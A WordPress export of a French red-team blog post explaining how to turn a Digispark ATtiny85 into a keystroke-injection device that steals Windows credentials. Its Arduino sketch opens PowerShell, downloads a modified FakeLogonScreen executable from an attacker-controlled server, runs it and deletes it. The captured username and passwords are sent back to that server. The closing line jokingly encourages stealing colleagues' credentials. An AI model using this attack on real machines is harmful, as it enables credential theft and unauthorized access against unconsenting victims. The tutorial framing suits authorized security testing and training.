{"id":572,"date":"2020-03-20T12:07:34","date_gmt":"2020-03-20T10:07:34","guid":{"rendered":"https:\/\/www.calypt.com\/blog\/?p=572"},"modified":"2020-07-23T13:09:52","modified_gmt":"2020-07-23T11:09:52","slug":"red-team-recuperer-des-identifiants-windows-avec-un-digispark","status":"publish","type":"post","link":"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/","title":{"rendered":"Red-Team : R\u00e9cup\u00e9rer des identifiants Windows avec un Digispark"},"content":{"rendered":"\n
\"Digispark<\/figure>\n\n\n\n

Il n’est pas rare, lors d’audits internes et\/ou Red Team, de croiser des sessions laiss\u00e9es n\u00e9gligemment ouvertes. La o\u00f9 le croissantage en bonne et due forme aurait eu lieu au bureau, il est souvent bien plus opportun d’essayer de r\u00e9cuperer de l’information strat\u00e9gique, et pourquoi pas des identifiants ?! <\/p>\n\n\n\n

Lors d’un audit en Red team<\/a>, l’utilisation d’un Rubber Ducky pr\u00e9programm\u00e9 peut faire gagner du temps aux auditeurs, ainsi que rendre certaines attaques plus furtives. Ce dispositif, plut\u00f4t que d’\u00eatre reconnu par le syst\u00e8me comme une clef USB par exemple, simule un clavier et permet, apr\u00e8s programmation, l’envoi de frappes clavier pr\u00e9alablement d\u00e9finies sur l’ordinateur de la victime. Ces ex\u00e9cutions de touches seront ex\u00e9cut\u00e9es bien plus rapidement qu’un auditeur averti ne pourrait le faire r\u00e9duisant ainsi le temps d’attaque et la crainte d’\u00eatre pris sur le fait.<\/p>\n\n\n\n

Du simple message texte \u00e0 des ex\u00e9cutions de commandes (Powershell, Bash, etc.) visant \u00e0 lancer un programme malveillant en passant par un Rickrollage <\/a>de circonstance, seule l’imagination de l’auditeur (et la m\u00e9moire du dispositif) limitent les possibilit\u00e9s.<\/p>\n\n\n\n

\u00c0 ce jour, un Rubber Ducky co\u00fbte environ 45\u20ac, ce qui n’est pas particuli\u00e8rement bon march\u00e9. N\u00e9anmoins il existe un concurrent au prix imbattable : le Digispark Attiny85, environ 3\u20ac l’unit\u00e9.<\/p>\n\n\n\n

L’utilisation est un peu moins triviale que pour le Rubber Ducky, mais permet d’effectuer, une fois apprivois\u00e9, des attaques similaires \u00e0 moindre co\u00fbt.<\/p>\n\n\n\n

Le Digispark a une m\u00e9moire de 6ko, contrairement au Rubber Ducky sur lequel on peut ajouter une micro carte SD. Donc selon vos attaques, vos payloads devront donc \u00eatre t\u00e9l\u00e9charg\u00e9s pendant l’ex\u00e9cution du Digispark. <\/p>\n\n\n\n

L’outil fakelogonscreen<\/a> permet de lancer une fausse page de connexion windows sur un ordinateur, et d’ensuite r\u00e9cup\u00e9rer le mot de passe. L’outil open source r\u00e9cup\u00e8re le nom de l’utilisateur, son mot de passe, ainsi que ses essais erron\u00e9s, mais avant de d\u00e9crire cette attaque, installons les diff\u00e9rents outils n\u00e9cessaires.<\/p>\n\n\n\n

\u00c9tape 1 : Mise en place de l’environnement<\/strong><\/p>\n\n\n\n

Pour plus de d\u00e9tails sur l’installation : <\/p>\n\n\n\n

https:\/\/digistump.com\/wiki\/digispark\/tutorials\/connecting<\/a><\/p>\n\n\n\n

https:\/\/digistump.com\/wiki\/digispark\/tutorials\/linuxtroubleshooting<\/a><\/p>\n\n\n\n

Linux<\/strong><\/p>\n\n\n\n

Pour Ubuntu : <\/p>\n\n\n\n

apt install arduino<\/code><\/p>\n\n\n\n

D\u00e9pendance n\u00e9cessaire : https:\/\/github.com\/micronucleus\/micronucleus<\/a><\/p>\n\n\n\n

Windows<\/strong> : <\/p>\n\n\n\n

Pour Windows, il est n\u00e9cessaire d’installer Arduino, puis les drivers n\u00e9cessaires :<\/p>\n\n\n\n

https:\/\/www.arduino.cc\/en\/main\/software<\/a><\/p>\n\n\n\n

https:\/\/github.com\/digistump\/DigistumpArduino\/releases\/download\/1.6.7\/Digistump.Drivers.zip<\/a><\/p>\n\n\n\n

Apr\u00e8s l’installation d’Arduino, il faut ajouter le package<\/em> Digistump suivant \u00e0 l’application dans la configuration :<\/p>\n\n\n\n

http:\/\/digistump.com\/package_digistump_index.json<\/code>\n\nFile -> Preferences<\/pre>\n\n\n\n
\"Ajout<\/figure>\n\n\n\n
Choisir ensuite le Board <\/em>Digispark par d\u00e9fault.<\/p>\n\n\n\n
\"Choix<\/figure>\n\n\n\n
Il est possible d\u00e8s \u00e0 pr\u00e9sent d’envoyer des programmes sur le Digispark ! Le package Board Digispark pr\u00e9c\u00e9demment install\u00e9 propose diff\u00e9rents exemples de programmes.<\/p>\n\n\n\n
Par exemple, le programme Keyboard, trivial, affiche en boucle le message “Hello Digispark”.<\/p>\n\n\n\n
File -> Exemples -> DigisparkKeyboard -> Keyboard<\/em><\/strong><\/p>\n\n\n\n
#include \"DigiKeyboard.h\"\n\nvoid setup() {\n  \/\/ don't need to set anything up to use DigiKeyboard\n}\n\nvoid loop() {\n  \/\/ this is generally not necessary but with some older systems it seems to\n  \/\/ prevent missing the first character after a delay:\n  DigiKeyboard.sendKeyStroke(0);\n  \n  \/\/ Type out this string letter by letter on the computer (assumes US-style\n  \/\/ keyboard)\n  DigiKeyboard.println(\"Hello Digispark!\");\n  \n  \/\/ It's better to use DigiKeyboard.delay() over the regular Arduino delay()\n  \/\/ if doing keyboard stuff because it keeps talking to the computer to make\n  \/\/ sure the computer knows the keyboard is alive and connected\n  DigiKeyboard.delay(5000);\n}<\/code><\/pre>\n\n\n\n
Cliquer sur upload<\/em>, rebrancher votre Digispark, et si tout c’est bien pass\u00e9, vous allez voir \u00e0 l’\u00e9cran “Hello Digispark” \u00e9crit en boucle !<\/p>\n\n\n\n
Attention, on suppose ici que vous utilisez un clavier QWERTY US, le digispark ne supporte pas bien les diff\u00e9rents layout<\/em>. Si votre victime utilise un clavier AZERTY FR par exemple, plusieurs solutions s’offrent \u00e0 vous :<\/p>\n\n\n\n
  • Convertir vos String de QWERTY US en AZERTY FR, “powershell” deviendra “pozershell”.<\/li>
  • Le script duck2spark permet de sp\u00e9cifier le layout et de convertir des scripts de Rubber Ducky compatible avec le Digispark (https:\/\/github.com\/mame82\/duck2spark)<\/li><\/ul>\n\n\n\n
    <\/p>\n\n\n\n
    Nous pouvons enfin commencer notre attaque !   <\/p>\n\n\n\n
    Etape 2 : Modifier FakeLogonScreen pour r\u00e9cup\u00e9rer les identifiants<\/strong><\/p>\n\n\n\n
    Lorsque la victime va rentrer son mot de passe, l’outil FakeLogonScreen va l’enregistrer dans un fichier ou l’afficher dans le terminal, or nous voulons le r\u00e9cup\u00e9rer. Pour cela, nous avons simplement ajout\u00e9 une requ\u00eate vers notre serveur comprenant le nom de l’utilisateur ainsi que son mot de passe lorsque la victime essaie de se connecter.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Compiler et placer l’executable sur votre serveur, pour qu’il puisse ensuite \u00eatre t\u00e9l\u00e9charg\u00e9 sur l’ordinateur de la victime. Ensuite, lancer un serveur HTTP pour r\u00e9cup\u00e9rer les identifiants dans les logs !<\/p>\n\n\n\n
    <\/p>\n\n\n\n
    Etape 3 : Cr\u00e9ation de l’attaque<\/strong><\/p>\n\n\n\n
    Le programme de notre attaque va t\u00e9l\u00e9charger notre application via le powershell<\/em>, lancer via la recherche de programe de Windows. Apr\u00e8s le lancement de l’ex\u00e9cutable, si jamais il n’a pas \u00e9t\u00e9 rep\u00e9r\u00e9 par l’antivirus de votre OS, la commande va attendre que la victime entre son mot de passe, pour supprimer le fichier du binaire et fermer le terminal.<\/p>\n\n\n\n
    Des d\u00e9lais plus ou moins longs sont n\u00e9cessaires, en effet le Digispark ne peut pas savoir si une commande a fini son ex\u00e9cution, il  faut donc mettre des d\u00e9lais plus long pour que vos attaques fonctionnent aussi sur des ordinateurs lents. \u00c0 vous de trouver le juste milieu pour que votre attaque ne prenne pas trop de temps ! <\/p>\n\n\n\n
    #include \"DigiKeyboard.h\"\n\nvoid setup() {\n  DigiKeyboard.sendKeyStroke(0);\n  DigiKeyboard.delay(1000);\n  \/\/ Lance la recherche de programme (touche Windows + R)\n  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);\n  DigiKeyboard.delay(100);\n  \/\/ Ouvre le terminal\n  DigiKeyboard.println(\"powershell\");\n  DigiKeyboard.delay(100);\n  DigiKeyboard.sendKeyStroke(KEY_ENTER);\n  DigiKeyboard.delay(500);\n  \/\/ T\u00e9l\u00e9charge le binaire de FakeLogonScreen pr\u00e9sent sur notre serveur\n  DigiKeyboard.println(\"wget http:\/\/192.168.0.106\/application.exe -OutFile .\/application.exe\");\n  DigiKeyboard.delay(500);\n  DigiKeyboard.sendKeyStroke(KEY_ENTER); \n  DigiKeyboard.delay(100);\n  \/\/ Lance le programme, puis attends la fin du processus pour supprimer le fichier ainsi que quitter le terminal\n  DigiKeyboard.println(\"Start-Process application.exe -wait; rm application.exe; exit\");\n  digitalWrite(1, HIGH);\n  }\n\n\/* Unused endless loop *\/\nvoid loop() {}<\/code><\/pre>\n\n\n\n
    Apr\u00e8s avoir modifi\u00e9 l’URL du serveur pour sp\u00e9cifier le v\u00f4tre, uploader le programme sur le Digispark. Brancher votre Digispark sur un Windows 10 et vous devriez voir l’attaque se d\u00e9rouler devant vos yeux !<\/p>\n\n\n\n
    \"Fausse<\/figure>\n\n\n\n
    On r\u00e9cup\u00e8re sur notre serveur le nom et le mot de passe de l’utilisateur, ainsi que ses diff\u00e9rents essais erron\u00e9s ! <\/p>\n\n\n\n
    \"Logs<\/figure>\n\n\n\n
    Vous pouvez maintenant utiliser votre Digispark pour subtiliser des identifiants lors d’audit en Red Team, ou bien ceux de vos coll\u00e8gues, et ainsi les croissanter quand vous voulez ! <\/p>\n\n\n\n
    \"Attack
    Vid\u00e9o de l’attaque<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"
    Il n’est pas rare, lors d’audits internes et\/ou Red Team, de croiser des sessions laiss\u00e9es n\u00e9gligemment ouvertes. La o\u00f9 le croissantage en bonne et due forme aurait eu lieu au bureau, il est souvent bien plus opportun d’essayer de r\u00e9cuperer de l’information strat\u00e9gique, et pourquoi pas des identifiants ?! Lors d’un audit en Red team, […]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[1],"tags":[78,77,81,60,80,79],"yoast_head":"\n\n\n\n\n\n\n\n\n\n\n\n\n\t\n